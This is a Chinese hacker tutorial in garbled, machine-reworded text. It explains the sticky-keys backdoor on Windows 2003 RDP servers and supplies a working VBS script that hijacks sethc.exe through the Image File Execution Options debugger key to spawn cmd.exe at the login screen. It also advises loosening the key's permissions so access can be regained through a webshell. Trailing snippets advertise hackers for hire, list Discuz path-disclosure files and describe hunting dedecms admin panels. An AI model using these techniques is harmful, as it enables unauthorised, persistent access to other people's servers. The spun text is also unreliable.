侧门和木马病毒有什么不同?
我觉得严苛实际意义沒有差别的,微小的区别是有的。有一个微小区别先讲一下,这两个词出去早中晚不一样。老一代 *** 黑客,不屑黑本人设备(那时候本人机网速太慢),觉得 *** 服务器才算是 *** 黑客的极限挑战。新一代 *** 黑客的见解截然不同,指定本人机侵入才算是较大 难题(如今你懂得的,经济发展权益高于一切)。
自然,约定成俗,在 *** 服务器上用的木马病毒算作侧门,在本人设备上用的侧门算作木马病毒,那样绕的弯子你明白了吗?
总而言之,对于 *** 服务器的管理权限保持能够叫侧门,对于本人设备的管理权限保持能够叫木马病毒。
这一节我而言一下现如今时期在3389端口号对外开放的win2003 *** 服务器里最时兴的粘滞键侧门吧。
什么叫粘滞键?
在win2003系统软件的3389端口号登录界面,你持续按住5次shif键,便会出現如下图所显示的页面。
在注册表文件中合这5下shif键映衬的是 c:/windows/system32下的sethc.exe。
实际的注册表文件键值是:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe
如果我们把sethc.exe改为其他exe,如同你的木马病毒,顺理成章就变成一个侧门了。
提到这,好像觉得侧门又比木马病毒高端了一下,实际上并不是的,再填补第二个微小区别,理应说侧门是随时随地让你留了一道门,让你能随时随地装一个木马病毒。
如果我们更改这一注册表文件键值,改为其他exe, *** 黑客界的专业术语叫镜像劫持,大家的粘滞键侧门就留好啦。自然,手工 *** 能够改,我写了一个简易的vbs还可以改,编码以下:
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exedebugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"system32cmd.exe","REG_SZ"
大家把上面的编码储存成1.vbs,双击鼠标运作,或cmd下运作cscript 1.vbs就可以了。
大家下一次再用mstsc登录这台2003 *** 服务器,再按5下shif键会出去哪些结果呢?会弹出来一个cmd命令行界面。
那样的话,便是我们家大门口常打开了。
一般的黑客教程写到这就神气十足了,实际上这一侧门留得不健全,大家来查询一下注册表文件里的:
HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options/sethc.exe/debugger
你能发觉仅有管理人员之上管理权限才有 *** 改这一注册表文件键值。
大家能不能再加上一个everyone管理权限,促使最少管理权限都是有 *** 改这一注册表文件键值呢?
当然可以。
改动了之后有什么作用?
假定这个侧门被发觉了,你还有一个Webshell存有,你能在Webshell管理权限下提升粘滞键侧门的,你的访问权限又回家了。
最终我再填补一点,高倍放大镜、讲述人这种exe能够同样更换的,但是并不是5次shift了,是win u键了,而且你再深层次下来,这一侧门就不仅是对于wind2003了,wind2008还可以。
也没有深层次,也不写这一高倍放大镜和讲述人的 *** 黑客侧门实例教程了。文章内容过长,一直没人细心看了。假如你能看了坚信对你能获得许多。
技术手机怎么找黑客 1、怎么找黑客exe是。技术手机成都接单就有点夸张了,该片在美国上映以后。41找黑客71。黑客而有些投资者图他的收益,很多程序员写一些可通过网络远程登录到其他pc的后台程序,什么合...
今日给大伙儿说的是某十四岁中学生,根据qq群通过自学网站渗透一个月,秒破网咖计费系统,这名网络黑客根据网络硬盘免费下载进攻破解软件,不上一分钟時间,在十四岁的小果子(笔名...
在《黑客基础术语:什么是命令行和环境变量?》本文里我讲过什么叫SHELL?大伙儿能够温故一下。本文章内容是这一系列产品的第五篇,主要讲一下什么是黑客里的互动式SHELL及其在非互动式SHELL里怎样...
网络黑客的渗入方式,实际上压根来自安全性的木桶原理。 决策一个公司的网络信息安全,在于安全性结构加固最少的那片木工板。 网络黑客通常会对企业安全生产里最少的那片木工板着手。 网络黑客在渗入的情况下,...
爆路径文件如下: /uc_server/control/admin/db.php /source/plugin/myrepeats/table/table_myrepeats.php /in...
有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。这样让大家很是蛋疼,下面我来介绍几种织梦系统找后台的方法。 织梦dedecms管理系统后台查找技巧 这个时候大家可以尝试下在地址...